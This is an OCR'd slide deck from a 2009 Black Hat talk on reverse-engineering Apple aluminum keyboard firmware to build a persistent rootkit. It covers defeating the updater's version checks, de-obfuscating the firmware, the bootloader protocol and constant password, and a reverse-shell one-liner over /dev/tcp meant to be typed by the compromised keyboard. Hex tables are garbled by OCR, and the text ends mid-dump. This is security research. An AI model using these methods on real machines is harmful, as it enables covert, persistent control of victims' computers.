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Black Hat USA, July 30th, 2009 



Q Introduction 

• Motivation 

• Keyboard control 

• Apple's keyboards 

• Firmware bugs 

O Firmware Update 
O Analysis 
O Exploitation 




Scenario (post-exploitation): 



• We've rooted somebody's Mac OS X box 

• Say after reading "The Mac Hacker's Handbook" by 
Charlie Miller and Dino Dai Zovi 

• We want to maintain control of the box 

http://upioad.wikimedia.0rg/wikipedia/en/1/if/sad_mac.png 



Proof-of-concept rootkit 



• "iRK - Crafting OS X Kernel Rootkits" by Jesse D'Aguanno 
(Black Hat 2008) 



We want to maintain control, even if 



• Apple releases patch for vulnerability we used 

• Owner is paranoid and re-installs Mac OS X from clean 
media 

• Owner safely updates patch level 



Fortunately for an attacker 



• Apple has a habit of releasing products before they're 
ready 

• Apple then later issues firmware updates 

• In May 2009, almost 1000 firmware updates available for 
download from support.apple.com 

• The Mac world is incredibly monocultural 



http://support.apple.com/downloads/ 



Apple has firmware updates available for: 



• graphics cards 

• keyboards 

• trackpads 

• bluetooth 

• EFI 

• SuperDrive 

• AirPort products 

• Time Capsule 

• etc. 



What can we do with control of the keyboard? 




http://www.flickr.eom/photos/errorsan/1 6431 5682/ 



How about shoveling a shell? 
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O I Return | 



O exec /bin/sh 0</dev/tcp/IP/PORT 1 >&0 2>&0 | Return | 



http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/ 



What if the user uses a Little Snitch? 




Little Snitch 2 (__£ 



No problem. Just add: 



O | Return | 

http://www.obdev.at/products/littlesnitch 



With custom keyboard firmware, we can persist a rootkit. 




http://en.wikipedia.org/wiki/File:Terry_0'Quinn.png 



Apple's current keyboard lineup: 



August 2007, USB $49 




August 2007, Bluetooth $79 



We are going to focus our attention on: 




'bhibbard/2534426907/ 



Keyboard firmware had bugs: 



The problem I have is that the modifier keys sometimes 
seem to 'skip' or stop being recognized. If I'm typing very 
fast and hold down something like shift or control, then 
type a few letters with that modifier key down, sometimes 
it will stop doing the job. So if I were to type a bunch of 
upper-case 'A's, it would look like 'Aaaaaaa', or worse, if 
I'm in Emacs, doing something like moving jp a few lines 

. 1 1" . I I ne CTRL-P, and 

then a bunch of 'p's. This feels like there's a glitch in the 
keyboard driver or something similar. 



rittp://discussions. apple. com/thread.jspa?messagelD=5745023 



Another complaint: 



■en Does anyone else have a problem with the new aluminum 

irnia keyboard? Mine misses to accept about one in dozen 

"joos keystrokes; this is definitely not a problem with how hard 

I press as I tend to hit the keys very hard. 

Any help would be welcome. 

Mac 05 X [10.S.2) Dual 2GHz FowErMac G5 

http://discussions.apple.com/thread.jspa?messagelD=6763413 



Q Introduction 



Q Firmware Update 

• Apple's Firmware Update 

• Version Checking 

• Reversing 

• Patching 

O Analysis 
O Exploitation 



I Aluminum Keyboard Firmware Update 1.0 



http://support.apple.com/downloads/Aluminum_Keyboard_Firmware_Update_1_0 



SHA1 (AIKybdFirmwareUpdate.dmg)=8c91 4be94e31 a1 f2543bd590d7239aebd ebbOcO 



Most likely, your keyboard has already been updated. 



ml 

, s ,a,, it i„n 




It doesn't matter. We can get around this. 




Also, man lsbom. 



We have extracted the updater application. 



[«MrcH |o||<H 




This thing also checks if the keyboard needs updating. 



n Aluminum Keyboard Finr 



Right-click and do "Show Package Contents." 
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Mora to Trash 
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*.app treated as a single entity by Finder, but actually are 
directories. Notice the executable file in MacOS. 




Recommend: Cameron Hotchkies' talk "Under the iHood" at 
REcon 2008. (http://www.recon.cx) 



Notice that the TLD for REcon is ex, not com. 



Look at all the stuff in the Resources directory. 
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Magic number is OxCAFEBABE (not Java bytecode however). 
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We look at the x86 binary. 
Aside: man lipo 



I/O Registry Explorer: 
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For our updated keyboard, we observe: 

• bed Device = 1 0x69 | 

• idProduct = 0x220 

• idVendor = 0x5ac 

We found that a keyboard that has not been updated has: 

• bed Device = 1 0x67 | 

• idProduct = 0x220 

• idVendor = 0x5ac 



Note: bcdDevice is a device's release number. 



Output from usbview on Windows: 

Endpoint Descriptor: 
bEndpointAddress: 0x81 IN 
Transfer Type: Interrupt 
wMaxPacketSize: 0x0008 (8) 



bim 



cil: 



Endpoint Descriptor: 
bEndpointAddress: 0x82 IN 
Transfer Type: Interrupt 
wMaxPacketSize: 0x0001 (1) 
blnterval: OxOA 



To disassemble the binary, I used: 



» otx L-^a http://otx.osxninja.com 

• much nicer output then otool 

• could have also used IDA Pro 

For binary editing, I used: 

• OxED ^^^ http://www.suavetech.com/Oxed/Oxed.html 



We need to do reverse-engineering for interoperability: 

"a person who has lawfully obtained the right to use a copy of a 
computer program may circumvent a technological measure 
that effectively controls access to a particular portion of that 
program for the sole purpose of identifying and analyzing those 
elements of the program that are necessary to achieve 
interoperability of an independently created computer program 
with other programs" 



Title 17, Chapter 12, §1201 (f)(1) 



Delegate method: applicationDidFinishLaunching: 

• runs after application launched and initialized, but prior to 
first event 

Calls a number of subroutines that 

• Checks O/S version is > 10.5.2 by consulting 

/Sy stem/Library /CoreServices/SystemVersion . pli st 

• Using I/O kit library, finds keyboard w/ vendor ID 0x0 5ac 
and product IDs 0x222, 0x221, 0x220, and 0x228 

• Checks the validity of the firmware image file 
kbd_0x0 69_0x0220 . irrxfw in the application bundle 
using a function called CRC32 : 



- (unsigned 1 


ong) [MyMainContro." 


3005 


pushl 


%ebp 


3006 


movl 


%esp, %ebp 


3008 


pushl 


%esi 


3009 


pushl 


%ebx 


300a 


subl 


$0x10, %esp 


300d 


movl 


0x10 (%ebp) , %ebx 


3010 


movl 


0x00008024, %eax 


3015 


movl 


%ebx, (%esp) 


3018 


movl 


%eax, 0x04 (%esp) 


301c 


calll 


0x000090e0 


3021 


movl 


%ebx, (%esp) 


3024 


movl 


%eax, %esi 


3026 


movl 


0x00008034, %eax 


302b 


movl 


%eax, 0x04 (%esp) 


302f 


calll 


0x000090e0 



3034 


xorl 


%ecx, %ecx 


3036 


xorl 


%edx, %edx 


3038 


movl 


%eax, %ebx 


303a 


jmp 


0x00003043 


303c 


movzbl 


(%edx, %ebx) , 


3040 


incl 


%edx 


3041 


addl 


%eax, %ecx 


3043 


cmpl 


%esi, %edx 


3045 


jb 


0x0000303c 


3047 


addl 


$0x10, %esp 


304a 


movl 


%ecx, %eax 


304c 


popl 


%ebx 


304d 


popl 


%esi 


304e 


leave 




304f 


ret 





If Apple can't even implement CRC32 correctly, what else did 
they screw up? 



To disable version checks, we need to patch the binary. 



Make both unconditional. 



NOP the conditional jump. 



After patching: 



Still have a problem: 




Let's look at the .nib file: 
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NSButton called "Update" 

• target outlet set to MyMainController 

• action set to doUpdate : 



doUpdate : 

• checks that machine doing update is plugged in 

• asks for administrator privileges 

• calls HIDFirmwareUpdaterTool twice 

O -parse kbd_0x00 69_0x0220 . irrxfw 

O -progress -pid 0x220 kbd_0x00 69_0x0220 . i 



• HiDFirmwareUpdaterTool has no symbol information. 

• It also checks the keyboard version. 

• It won't do anything if bcdDevice is > 0x68. 



NOP the Jump if above instruction. 



Success! Now we can flash the keyboard to 0x69 firmware. 
Demo. 



Q Introduction 

O Firmware Update 

O Analysis 

• Obfuscation 

• Bootloader operation 

• Bootloader communication 

• Hardware 



Q Exploitation 



Apple Obfuscated kbd_0x0 6 9_0x02 2 . ir 



$ hexdump -n 32 kbd_0x0069_0x0220 . : 
0000000 e3 cO 37 ba 07 7f 9b fb aO 
0000010 bd d2 f3 df 16 db 8f 85 c8 
0000020 



cd 9a 
. 6e 9a 



Apple Obfuscated kbd_0x0069_0x0220 . irrxfw. 



$ hexdump -n 32 kbd_0x0069_0x0220 . irrxfw 

0000000 e3 cO 37 ba 07 7f 9b fb aO 4d ae b3 e4 cd 9a 7f 

0000010 bd d2 f3 df 16 db 8f 85 c8 55 88 ac 5a 6e 9a fO 

0000020 



Apple Obfuscated kbd_0x0069_0x0220 . irrxfw. 

$ hexdump -n 32 kbd_0x0069_0x0220 . irrxfw 

0000000 e3 cO 37 ba 07 7f 9b fb aO 4d ae b3 e4 cd 9a 7f 

0000010 bd d2 f3 df 16 db 8f 85 c8 55 88 ac 5a 6e 9a fO 

0000020 



^7 T~N obfuscated , 
Apple ) — ►( Mac 



Apple Obfuscated kbd_0x0069_0x0220 . irrxfw. 

$ hexdump -n 32 kbd_0x0069_0x0220 . irrxfw 

0000000 e3 cO 37 ba 07 7f 9b fb aO 4d ae b3 e4 cd 9a 7f 

0000010 bd d2 f3 df 16 db 8f 85 c8 55 88 ac 5a 6e 9a fO 

0000020 



^7 T~N obfuscated ^77^\ unobfuscated , , . 
Apple j — A Mac ) — *-( keyboard 



Apple Obfuscated kbd_0x0069_0x0220 . irrxfw. 

$ hexdump -n 32 kbd_0x0069_0x0220 . irrxfw 

0000000 e3 cO 37 ba 07 7f 9b fb aO 4d ae b3 e4 cd 9a 7f 

0000010 bd d2 f3 df 16 db 8f 85 c8 55 88 ac 5a 6e 9a fO 

0000020 



^7 T~N obfuscated ^77^\ unobfuscated , , . 
Apple j — A Mac ) — *-( keyboard 



Fortunately, we can use HIDFirmwareUpdaterTool to 
de-obfuscate it for us. 



In fact, the plan is: 



| Attacker | 
owned 



In fact, the plan is: 



| Attacker | 
owned 



In fact, the plan is: 



| Attacker | 
owned 



. . x obfuscated /v. \unobfuscated #y . . 
Apple ) — *\ Mac ) *\ keyboard 



In fact, the plan is: 




In fact, the plan is: 



| Attacker | 
owned 
\unobfuscated #/ 



owned 



First, let's examine Apple's obfuscation of the firmware. 



Let A = A Q Ai ■■■A 82 denote 

31 lc ef 62 df a7 43 23 78 92 22 6a 38 12 14 a4 

65 02 2b 00 9c 00 57 5e 10 85 50 73 dO bl 17 2b 

49 ac 49 c4 33 21 b4 48 23 8c 27 98 12 34 80 00 

48 ff b4 8f 04 2e 24 2d 92 c7 82 e2 a6 a5 20 20 

98 11 84 26 b7 cc 28 f3 e6 98 38 23 dc ba 28 44 
42 39 44 

and let B = B B : ■ ■ ■ B 52 denote 

12 14 a4 65 02 2b 00 9c 00 57 5e 10 85 50 73 dO 

bl 17 2b 49 ac 49 c4 33 21 b4 48 23 8c 27 98 12 

34 80 00 48 ff b4 8f 04 2e 24 2d 92 c7 82 e2 a6 
a5 20 20 98 11 



De-obfuscation algorithm: 

The de-obfuscation routine reads the firmware file in 83 byte 
chunks with the rth chunk XOR-ed with the 1 's complement of A 
and then each byte XOR-ed with 6 /+16 mod 53 to produce the 
"plaintext." 



There is further de-obfuscation, but we didn't bother with it. 



Apple didn't get the memo about "security through obscurity." 




Movie: Office Space (1999) 



We can dump the unobfuscated firmware out of memory easily. 

$ gdb -q HIDFirmwareUpdaterTool 

(gdb) b *0x4abc 
Breakpoint 1 at 0x4abc 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . irrxfw 
Breakpoint 1, 0x00004abc in ?? () 

(gdb) dump binary memory dump. bin 0x61ec 0x89ec 



We can dump the unobfuscated firmware out of memory easily. 

$ gdb -q HIDFirmwareUpdaterTool 

(gdb) b *0x4abc 
Breakpoint 1 at 0x4abc 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . irrxfw 
Breakpoint 1, 0x00004abc in ?? () 

(gdb) dump binary memory dump. bin 0x61ec 0x89ec 

$ hexdump -n 7 3 dump. bin 

0000000 00 02 00 30 30 30 30 7d 03 dO 7e 7e 30 30 30 7e 

0000010 30 30 30 7d 03 dc 7e 7d 03 eO 7e 7d 03 d4 7e 7d 

0000020 la 40 7e 00 02 01 7d 17 66 7e 7d 17 71 7e 7d 17 

0000030 7c 7e 7d 17 89 7e 7e 30 30 30 7d 06 96 7e 7e 30 

0000040 30 30 7e 30 30 30 00 03 00 

0000049 



We can dump the unobfuscated firmware out of memory easily. 

$ gdb -q HIDFirmwareUpdaterTool 

(gdb) b *0x4abc 
Breakpoint 1 at 0x4abc 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . irrxfw 
Breakpoint 1, 0x00004abc in ?? () 

(gdb) dump binary memory dump. bin 0x61ec 0x89ec 

$ hexdump -n 7 3 dump. bin 

0000000 00 02 00 30 30 30 30 7d 03 dO 7e 7e 30 30 30 7e 

0000010 30 30 30 7d 03 dc 7e 7d 03 eO 7e 7d 03 d4 7e 7d 

0000020 la 40 7e 00 02 01 7d 17 66 7e 7d 17 71 7e 7d 17 

0000030 7c 7e 7d 17 89 7e 7e 30 30 30 7d 06 96 7e 7e 30 

0000040 30 30 7e 30 30 30 00 03 00 

0000049 



To enter bootloader mode: 



• keyboard doesn't have an interrupt OUT endpoint 

• so it has to use the control endpoint 

• function 0x000020c3 in HIDFirmwarellpdaterTool does this 

• calls IOUSBDeviceClass::deviceDeviceRequest(void *self, 
lOUSBDevRequest *reqln) 



Set a breakpoint right before the call to 
IOUSBDeviceClass::deviceDeviceRequest(void *self, 
lOUSBDevRequest *reqln) 

$ gdb -q HIDFirmwareUpdaterTool 
(gdb) tb *0x2129 
Breakpoint 1 at 0x2129 

(gdb) r -progress -pid 0x220 kbd_0x0069_0x0220 . irrxfw 
(gdb) x $esp+4 
0xbffff584: 0xbffff590 
(gdb) x/16b 0xbffff590 

0xbffff590: 0x21 0x09 0x0a 0x03 0x00 0x00 0x01 0x00 
0xbffff598: 0x5c 0xf6 Oxff Oxbf 0x00 0x00 0x00 0x00 



.ypedef s1 
IInt8 


bmRequt 


IInt8 


bRequei 


IIntl6 


wValue; 


IIntl6 


wlndex; 


Untl6 


wLengtl 


'oid * 


pData; 


IInt32 


wLenDoi 


IOUSBDe' 


/Request; 



.ypedef s1 
IInt8 


bmReque 


IInt8 

IIntl6 


bRequei 
wValue; 


IIntl6 


wlndex; 


Untl6 

Unt32 


wLenDoi 


IOUSBDe' 


/Request; 



According to the USB standard, this is the HID-specific 
Set_Report request. 



"The Set_Report request allows the host to send a report to the 
device, possibly setting the state of input, output or feature 
controls." 

http://www.usb.org/developers/devclass_docs/HID1_1 1 .pdf 



.ypedef s1 
IInt8 


bmRequest 


IInt8 


bRequest; 


IIntl6 


wValue; 


IIntl6 


wlndex; 


Untl6 


wLength; 


'oid * 


pData; 


Unt32 


wLenDone; 


IOUSBDe' 


/Request; 



High byte is the report type. (0x03 = Feature, 0x02 = Output). 
Low byte contains the report ID. 



.ypedef s1 

Hnt8 


bmRequest 


Hnt8 


bRequest, 


IIntl6 


wValue; 


IIntl6 


wlndex; 


!Intl6 


wLength; 


'oid * 


pData; 


IInt32 


wLenDone; 


IOUSBDe' 


/Request; 



The number of the interface the request is directed to. 



.ypedef i 
IInt8 


bmRequest 


Hnt8 


bRequest, 


IIntl6 


wValue; 


IIntl6 


wlndex; 


Untl6 


wLength; 


'Old * 


pData; 



} IOUSBDevRequest; 

The length of the report. 



.ypedef s1 

Hnt8 


bmRequest 


Hnt8 


bRequest, 


IIntl6 


wValue; 


IIntl6 


wlndex; 


Untie 


wLength; 


'oid * 


pData; 


Unt32 


wLenDone; 


IOUSBDe' 


/Request; 



The data is simply just 



f6 ff bf 



Summary: to put the keyboard into bootloader mode, send a 
feature Set_Report to the keyboard using: 



• bRequest = 0x09 

• wLength = 0x0001 

• wValue = 0x030a 

• wlndex = 0x0000 

• data = 0x0a 



msmm; 



The first 64 byte packet sent to the keyboard is 



$ gdb 


-q HIDFn 


rmwareUpdate 


rTool 










(gdb) b *0x2eC 


a 














Breakpoint 1 a 


t 0x2e 


Da 












(gdb) r -progress -p 


id 0x220 kbd_ 


0x0069 


_0x0220.irr 


xfw 


Breakpoint 1, 


0x00002e0a i 


n ?? () 










(gdb) x/64b 0xa7c0 














0xa7c0 


Oxff 


0x38 


0x00 


0x01 


0x02 


0x03 


0x04 


0x05 


0xa7c8 


0x06 


0x07 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa7d0 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa7d8 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa7e0 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa7e8 


0x00 


0x00 


0x00 


0x00 


0x00 


0x53 


0x00 


0x00 


0xa7f0 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa7f8 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 



It was not difficult to determine: 



• commands to the bootloader 

• the bootloader password 

• data format 

• checksum calculation 

• return codes 



Structure of the packets: 



ff 38 00 01 02 03 04 05 06 07 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 00 00 00 00 00 53 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 

Bootloader commands: 



• ff 38: enter bootload mode 

• ff 39: write to flash memory 

• ff 3a: verify flash memory 

• ff 3b: exit bootloader 



Structure of the packets: 



ff 


38 
00 
00 


00 


01 


02 


03 


04 


05 


06 


07 


00 
00 
00 


00 


00 
00 


00 

00 


00 
00 


00 
00 


00 

00 


00 

00 


00 
00 


00 

00 


00 

00 


00 
00 



00 00 00 00 00 00 00 00 00 53 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 

Bootloader password: 



• constant password 



Structure of the packets: 



ff 38 


00 

00 


01 
00 


02 
00 


03 

00 


04 
00 


05 
00 


06 

00 


07 
00 


00 


00 


00 00 


00 


00 


00 00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 00 


00 


00 


00 


00 


00 


00 


00 


53 


00 


00 


00 00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 00 


00 


00 


















Block number: 





















• each block is 64 bytes 

• sent over 32 bytes at a time 



Structure of the packets: 



ff 


38 


00 


01 


02 


03 


04 


05 


06 


07 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


53 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 



















Indicates which half of the block: 



Structure of the packets: 



ff 


38 


00 


01 


02 


03 


04 


05 


06 


07 


00 


00 


00 
00 


00 
00 
00 


00 
00 
00 


00 
00 
00 


00 
00 
00 


00 
00 
00 


00 
00 
00 


00 
00 
00 


00 
00 
00 


00 
00 


00 
00 


00 
00 


00 


53 
00 


00 
00 


00 


00 
00 


00 
00 


00 

00 


00 

00 


00 


00 


00 


00 


00 


00 



• 32 bytes in length 



Structure of the packets: 



ff 38 


00 


01 


02 


03 


04 


05 


06 


07 


00 


00 


00 00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 00 


00 


00 


00 


00 


00 


00 


00 


53 


00 


00 


00 00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 


00 00 


00 


00 


















Checksum 























• 53 = ff + 38 + 01 +02 + - 



f 07 (mod 0x100) 



The first 64 byte packet received back is 



(gdb) x/64b Ox 


a760 












0xa760 


0x20 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa768 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa770 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa778 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa780 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa788 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa790 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0xa798 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 



The first 64 byte packet received back is 



(gdb) x/64b Ox 


a760 


0xa760 


0x20 


0x00 


0xa768 


0x00 


0x00 


0xa770 


0x00 


0x00 


0xa778 


0x00 


0x00 


0xa780 


0x00 


0x00 


0xa788 


0x00 


0x00 


0xa790 


0x00 


0x00 


0xa798 


0x00 


0x00 



0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 


0x00 



The first byte is the return value. 



Return value Reason for error 

0x0 Device did not respond error 

0x08 Flash protection error 

0x10 Communication checksum error 

0x20 No error 

0x80 Invalid command error 



There is a final checksum at the very end. 



30 30 30 30 7d 03 

7e 30 30 30 7e 30 

7d 03 dc 7e 7d 03 

7d 03 d4 7e 7d la 



There is a final checksum at the very end. 



30 30 30 30 

7e 30 30 30 

7d 03 dc 7e 

7d 03 d4 7e 

7d 17 66 7e 

7d 17 7c 7e 

7e 30 30 30 

7e 30 30 30 



7d la 40 7e 

7d 17 71 7e 

7d 17 89 7e 

7d 06 96 7e 

7e 30 30 30 



There is a final checksum at the very end. 



30 30 30 30 

7e 30 30 30 

7d 03 dc 7e 

7d 03 d4 7e 

7d 17 66 7e 

7d 17 7c 7e 

7e 30 30 30 

7e 30 30 30 



7d la 40 7e 

7d 17 71 7e 

7d 17 89 7e 

7d 06 96 7e 

7e 30 30 30 



30 30 30 30 30 30 30 30 

30 30 30 30 30 30 30 30 

30 30 30 30 30 30 30 30 

30 30 30 30 30 30 30 30 



Structure of the last write packet: 



ff 39 00 


01 


02 


03 


04 


05 


06 


07 


00 


01 30 30 


30 


30 


30 


30 


30 


30 


30 


30 


30 30 30 


30 
30 


30 
30 


30 
30 


30 
30 


30 


30 


30 
73 


30 


30 30 30 


e4 


lb 




Final checksum: 









• 0x4e41b = 0xe41b (mod 0x10000) 

• stored in big endian format 




http://cache0.techcrunch.com/wp-content/uploads/2009/02/picardshot.png 




http://cache0.techcrunch.com/wp-content/uploads/2009/02/picardshot.png 

• No cryptographic signature of the firmware 



In order to be able to modify the firmware for our own purposes, 
we need to look at the hardware. 




http://benfrantzdale.livejournal.com/238768.html 




http://benfrantzdale.livejournal.com/238768.html 




• Cypress CY7C63923 low-speed USB controller 

• 8-bit microcontroller, Harvard architecture 

• 256 bytes of RAM, 8 Kbytes of flash 

• chip doesn't seem available for purchase or sampling 

• datasheet no longer available on Cypress' website 

http://datasheet.digchip.eom/1 1 5/1 1 5-1 531 2-CY7C6331 0.pdf 



Program Counter 

• 16 bits 

• program memory is 8K 

Accumulator (A) 

• 8 bits 

• general purpose register 

Stack Pointer (SP) 

• 8 bits 

• grows upwards 



Index (X) 

• 8 bits 

• holds offset values used in indexed addressing modes 

Flags (F) 

• 8 bits 

• Global interrupt enabled bit 

• Zero flag bit 

• Carry flag bit 

• Supervisory State Bit 

• readable only with register address 0xF7 

• set and clear bits using special OR/AND instructions 



Microcontroller's SSC (Supervisory System Call) can do: 



Table 9-1. SROM Function Codes 



Function Code 


Function Name 


Stack Space 


OOh 


SWBootReset 





01 h 


ReadBlock 


7 


02h 


WriteBlock 


10 


03h 


EraseBlock 


9 


05h 


EraseAII 


11 


06h 


TableRead 


3 


07h 


Checksum 


3 



We are particularly interested in: 

Table 9-5. WriteBlock Parameters 



Name 


Address 


Description 


KEY1 


0,F8h 


3Ah 


KEY2 


0,F9h 


Stack Pointer value, when SSC is 
executed. 


BLOCKID 


O.FAh 


Flash block number (00h— FFh) 
Flash block number <00h— 3Fh) 


POINTER 


O.FBh 


First of 64 addresses in SRAM, where 
the data to be stored in Flash is 
located prior to calling WriteBlock. 


CLOCK 


O.FCh 


Clock divider used to set the write 
pulse width. 


DELAY 


O.FEh 


For a CPU speed of 1 2 MHz set to 56h 



USB Serial Interface Engine takes care of: 



• translating/formatting data to/from USB bus 

• CRC 

• device address checking 

• sending ACK/NAK/STALL handshakes 

• identifying SETUP, IN, OUT tokens 

• putting received data into endpoint buffers 

• sending and updating data toggle bit 

• bit stuffing/unstuffing 



Firmware has to take care of: 



• Enumeration 

• Filling and emptying FIFOs 

• Coordinating suspend/resume 

• Verify/selecting data toggle values 



Ml! 



• Microchip 25LC040A 

• 4-kilobit EEPROM with SPI interface 

http://ww1 .microchip.com/downloads/en/DeviceDoc/21 827E.pdf 




• Cypress CY7C65630 USB 2.0 hub controller 

• supports up to 4 ports, but Apple uses only 3 

• configured using the EEPROM 

http://download.cypress.com/design_resources/datasheets/contents/cy7c65630_8.pdf 



A rough schematic: 
upstream USB 



CY7C65630 hub | 1 EEPROM | 



CY7C63923 



keyboard matrix 



USB port 
USB port 



We applied a coin-cell battery to the terminals of the ribbon 
cable to find the pins of the LED under the Caps Lock key. 



a 



m 



Tracing paths on the board, we observed that the LED is 
active-low on pin P2.7 of the microcontroller. 




O Introduction 

O Firmware Update 

O Analysis 

Q Exploitation 

• Some simple exploits 

• Hooking endpoint buffer 

• Keystroke logger 

• Loose ends 



Table 14-3. P 


2 Data Register (P2DATA) [0x02] [PJW] 












7 | 6 | 5 | 4 | 3 J 


1 | 










R ,W I .W .,V | K,W I «W 1 »» 






| | | 




Bil | i] F 
Bit '[1:0]: P2 


Data [7:2] 


:::; 


nSSOPpa.a, 


,o W 


2,-P, 4 



Aside: See also P2CR [0x15], the P2 configuration register. 

http://datasheet.digchip.eom/1 1 5/1 1 5-1 531 2-CY7C6331 0.pdf 





1 

1 


1 


1 


— 


„.. 


























































-.■O'.'A • i|Xtexpi] 
















































MOV -c.;.e.or], expr 






s-. 


' 


■' 


MOVr,, 5 x-expr],expr 





We are interested in MOV reg[0x02], 
expr instructions. 



i.e. 0x62 0x02 in the (unobfuscated) 
firmware image. 



http://datasheet.digchip.eom/1 1 5/1 1 5-1 531 2-CY7C6331 0.pdf 



The first unobfuscated block is: 










HALT 











HALT 











HALT 











HALT 




d 


03 


dO 


LJMP 


03 d 


e 






RET I 




e 










RETI 
HALT 
HALT 
HALT 




e 










RETI 
HALT 
HALT 
HALT 




d 


03 


dc 


LJMP 


03 dc 


e 






RETI 





The first unobfuscated block is a (relocated) IVT. 










HALT 






POR/LVD 









HALT 















HALT 















HALT 








d 


03 


dO 


LJMP 


03 


dO 


INTO 


e 






RET I 








e 










RETI 
HALT 
HALT 
HALT 






SPI Transmitter Empty 


e 










RETI 
HALT 
HALT 
HALT 






SPI Receiver Full 


d 


03 


dc 


LJMP 


03 


dc 


GPIO Port 


e 






RETI 









At the end of the (relocated) IVT: 



RET I 

HALT 

HALT 

HALT 

RET I 

HALT 

HALT 

HALT 

RET I 

HALT 

HALT 

HALT 

MOV [91] 

RETI 

JMP lb - 



GPIO Port 



(gdb) x/38b Ox 


64a8 


0x64a8 


OxOO 


OxOc 


0x64b0 


0x00 


0x55 


0x64b8 


0x02 


0x80 


0x64c0 


0xe2 


0x00 


0x64c8 


0x8f 


Oxff 



0xf9 0x00 0x50 



0x50 0x00 OxOc 



0x90 
0x7c 
0x01 



(gdb) x/38b Ox 


64a8 


0x64a8 


OxOO 


OxOc 


0x64b0 


0x00 


0x55 


0x64b8 


0x02 


0x80 


0x64c0 


0xe2 


0x00 


0x64c8 


0x8f 


Oxff 



0xf9 0x00 0x50 



0x50 0x00 OxOc 



Oxa3 


0x4e 


0x62 


0x90 


OxOb 


0x62 


0x7c 


0x03 


0xe3 


0x01 







The desired sequence. 



(gdb) x/38b 0x64a8 



0x64a8 


0x00 


0x0c 


0x64b0 


0x00 


0x55 


0x64b8 


0x02 


0x80 


0x64c0 


0xe2 


0x00 


0x64c8 


0x8f 


Oxff 



0xf9 0x00 0x50 



0x50 0x00 OxOc 



0x90 
0x7c 
0x01 



Address = 0x40 (block size) * Oxc (block number) = 0x300. 



(gdb) x/38b Ox 


64a8 


0x64a8 


OxOO 


OxOc 


0x64b0 


0x00 


0x55 


0x64b8 


0x02 


0x80 


0x64c0 


0xe2 


0x00 


0x64c8 


0x8f 


Oxff 



0xf9 0x00 



0x32 
0x50 
0x9d 



0x50 0x00 OxOc 



0x90 
0x7c 
0x01 



Address = 0x40 (block size) * Oxc (block number) = 0x300. 

0300: 43 32 00 OR reg[32], 00 



(gdb) x/38b 0x64a8 


0x64a8 


0x00 0x0c 


0x64b0 


0x00 0x55 


0x64b8 


0x02 0x80 


0x64c0 


0xe2 0x00 


0x64c8 


0x8f Oxff 



0xf9 0x00 0x50 



0x50 0x00 OxOc 



0x00 0x55 0xf8 

0xa3 0x4e 0x62 

0x90 OxOb 0x62 

0x7c 0x03 0xe3 
0x01 



Address = 0x40 (block size) * Oxc (block number) = 0x300. 



0300: 43 32 ( 
0303: 55 f8 I 



OR reg[32] 
MOV [f8], 



(gdb) x/38b 0x64a8 


0x64a8 


0x00 0x0c 


0x64b0 


0x00 0x55 


0x64b8 


0x02 0x80 


0x64c0 


Oxe2 0x00 


0x64c8 


0x8f Oxff 



0xf9 0x00 0x50 



0x50 0x00 OxOc 



0x90 
0x7c 
0x01 



Address = 0x40 (block size) * Oxc (block number) = 0x300. 



0300: 43 32 00 
0303: 55 f8 00 
0306: 55 f9 00 



OR reg[32] 
MOV [f8], 
MOV [f9], 



(gdb) x/38b Ox 


64a8 


0x64a8 


OxOO 


OxOc 


0x64b0 


0x00 


0x55 


0x64b8 


0x02 


0x80 


0x64c0 


0xe2 


0x00 


0x64c8 


0x8f 


Oxff 



0x32 


0x00 


0x50 


0xa3 


0x9d 


0x90 



0xf9 0x00 



0x50 0x00 OxOc 0x01 



Address = 0x40 (block size) * Oxc (block number) = 0x300. 



0300 


43 


32 00 


OR reg[32 


0303 


55 


f8 00 


MOV [f8], 


0306 


55 


f9 00 


MOV [f9], 


0309 


50 


a3 


MOV A, a3 



(gdb) x/38b Ox 


64a8 


0x64a8 


OxOO 


OxOc 


0x64b0 


0x00 


0x55 


0x64b8 


0x02 


0x80 


0x64c0 


0xe2 


0x00 


0x64c8 


0x8f 


Oxff 



0xf9 0x00 0x50 



0x50 0x00 OxOc 



0x90 
